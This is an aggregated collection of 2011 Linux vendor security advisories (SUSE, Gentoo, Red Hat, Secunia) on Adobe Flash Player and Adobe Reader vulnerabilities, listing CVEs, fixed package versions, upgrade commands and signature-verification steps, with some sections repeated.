announcement. The output for a valid signature looks like:
gpg: Signature made <DATE> using RSA key ID 3D25D3D9
gpg: Good signature from "SuSE Security Team <security@suse.de>"
where <DATE> is replaced by the date the document was signed.
If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command
gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc
- Package authenticity verification:
SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.
The internal rpm package signatures provide an easy way to verify the
authenticity of an RPM package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, replacing <file.rpm> with the
filename of the RPM package downloaded. The package is unmodified if it
contains a valid signature from build@suse.de with the key ID 9C800ACA.
This key is automatically imported into the RPM database (on
RPMv4-based distributions) and the gpg key ring of 'root' during
installation. You can also find it on the first installation CD and at
the end of this announcement.
- SUSE runs two security mailing lists to which any interested party may
subscribe:
opensuse-security@opensuse.org
- General Linux and SUSE security discussion.
All SUSE security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security+subscribe@opensuse.org>.
opensuse-security-announce@opensuse.org
- SUSE's announce-only mailing list.
Only SUSE's security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security-announce+subscribe@opensuse.org>.
The <security@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular, the
clear text signature should show proof of the authenticity of the text.
SUSE Linux Products GmbH provides no warranties of any kind whatsoever
with respect to the information contained in this security advisory.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2130, CVE-2011-2134, CVE-2011-2135,
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138, CVE-2011-2139, CVE-2011-2140,
CVE-2011-2414, CVE-2011-2415, CVE-2011-2416, CVE-2011-2417, CVE-2011-2424,
CVE-2011-2425, CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430)
A flaw in Adobe Flash Player could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Red Hat update for flash-plugin
SECUNIA ADVISORY ID:
SA45593
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45593/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45593
RELEASE DATE:
2011-08-12
DISCUSS ADVISORY:
http://secunia.com/advisories/45593/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45593/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45593
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Red Hat has issued an update for flash-plugin. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
disclose sensitive information and compromise a user's system.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY:
RHSA-2011:1144-1:
https://rhn.redhat.com/errata/RHSA-2011-1144.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor
VAR-201108-0210 | CVE-2011-2417 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2140, and CVE-2011-2425. Adobe Flash Player and Adobe AIR Any code that could be executed or service disruption ( Memory corruption ) There is a vulnerability that becomes a condition. This vulnerability CVE-2011-2135 , CVE-2011-2140 ,and CVE-2011-2425 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SUSE Security Announcement
Package: flash-player
Announcement ID: SUSE-SA:2011:033
Date: Wed, 10 Aug 2011 14:00:00 +0000
Affected Products: SUSE Linux Enterprise Desktop 11 SP1
SUSE Linux Enterprise Desktop 10 SP4
Vulnerability Type: remote code execution
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
SUSE Default Package: yes
Cross-References: CVE-2011-2130, CVE-2011-2134, CVE-2011-2135
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138
CVE-2011-2139, CVE-2011-2140, CVE-2011-2414
CVE-2011-2415, CVE-2011-2416, CVE-2011-2417
CVE-2011-2425
Content of This Advisory:
1) Security Vulnerability Resolved:
remote code execution
Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information
______________________________________________________________________________
1) Problem Description and Brief Discussion
Flash-Player was updated to version 10.3.188.5 to fix various buffer
and integer overflows:
- CVE-2011-2130: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2134: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2135: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2136: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2137: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2138: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2139: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2140: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2414: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2415: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2416: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2417: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2425: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Earlier flash-player versions can be exploited to execute arbitrary code
remotely with the privileges of the attacked user.
For more details see:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
2) Solution or Work-Around
none
3) Special Instructions and Notes
Pleease restart your browser.
4) Package Location and Checksums
The preferred method for installing security updates is to use the YaST
"Online Update" module or the "zypper" commandline tool. The package and
patch management stack will detect which updates are required and
automatically perform the necessary steps to verify and install them.
Alternatively, download the update packages for your distribution manually
and verify their integrity by the methods listed in Section 6 of this
announcement. Then install the packages using the command
rpm -Fhv <file.rpm>
to apply the update, replacing <file.rpm> with the filename of the
downloaded RPM package.
Our maintenance customers are notified individually. The packages are
offered for installation from the maintenance web:
SUSE Linux Enterprise Desktop 10 SP4
http://download.novell.com/patch/finder/?keywords=7c71e4aec6afd72e6b40f8cf2817e900
SUSE Linux Enterprise Desktop 11 SP1
http://download.novell.com/patch/finder/?keywords=377e091a105e9d540a2a90f09cff0a10
______________________________________________________________________________
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
______________________________________________________________________________
6) Authenticity Verification and Additional Information
- Announcement authenticity verification:
SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.
To verify the signature of the announcement, save it as text into a file
and run the command
gpg --verify <file>
replacing <file> with the name of the file where you saved the
announcement. The output for a valid signature looks like:
gpg: Signature made <DATE> using RSA key ID 3D25D3D9
gpg: Good signature from "SuSE Security Team <security@suse.de>"
where <DATE> is replaced by the date the document was signed.
If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command
gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc
- Package authenticity verification:
SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.
The internal rpm package signatures provide an easy way to verify the
authenticity of an RPM package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, replacing <file.rpm> with the
filename of the RPM package downloaded. The package is unmodified if it
contains a valid signature from build@suse.de with the key ID 9C800ACA.
This key is automatically imported into the RPM database (on
RPMv4-based distributions) and the gpg key ring of 'root' during
installation. You can also find it on the first installation CD and at
the end of this announcement.
- SUSE runs two security mailing lists to which any interested party may
subscribe:
opensuse-security@opensuse.org
- General Linux and SUSE security discussion.
All SUSE security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security+subscribe@opensuse.org>.
opensuse-security-announce@opensuse.org
- SUSE's announce-only mailing list.
Only SUSE's security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security-announce+subscribe@opensuse.org>.
The <security@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular, the
clear text signature should show proof of the authenticity of the text.
SUSE Linux Products GmbH provides no warranties of any kind whatsoever
with respect to the information contained in this security advisory.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
